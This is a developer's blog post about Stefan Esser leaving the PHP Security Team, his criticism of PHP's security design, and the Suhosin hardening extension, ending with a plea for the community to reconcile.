In the last days there was a big discussion in the PHP-community about Stefan Essers retirement from the PHP Security Team. He states, that changing PHPs security from inside is futile, as he has been quoted by Slashdot. Stefan has found a lot of serious security holes in diverse software projects over years and he seems to be one of the best-skilled security researchers who permanently audits free software, which is always a good thing. He critizises, that fixing security holes in PHP takes too long and that he is taken as a persona non grata because he also blames PHPs design problems not just application bugs.
Stefan constantly put the finger on the wound in the last years, that PHP comes with bunch of features making it easy for beginners to blow away their whole leg when writing PHP-programs or being unexperienced in configuring their PHP-environment in a sane way. Starting from remote file inclusion, which is maybe the top-seller of remote exploits in PHP projects, over header-splitting attacks, to register globals he insists that not everything is in the application developers responsibility. Also he did research in PHPs »deep shit«, e.g. memory management. He is one of the authors of hardened PHP, a patch to make a PHP-installation more robust and suhosin, which attempts the same target and being binary compatible to vanilla PHP, which the hardened patch was not. I’m using the suhosin extension and also I really do not agree with the way to low defaults, I like the extension.
I’m not a PHP-insider, I cannot assess the different standpoints but I’m a software developer who likes to use PHP for daily work, for fun and for profit. And I care about application- and interpreter-level security. So my interest is to be sure that the best are working together in the PHP Security Team. Hopefully in a few weeks when heat of the discussion is gone a wise man could bang heads together again. It would be the best for the PHP-world and I would like to ask everyone not to make the gap deeper.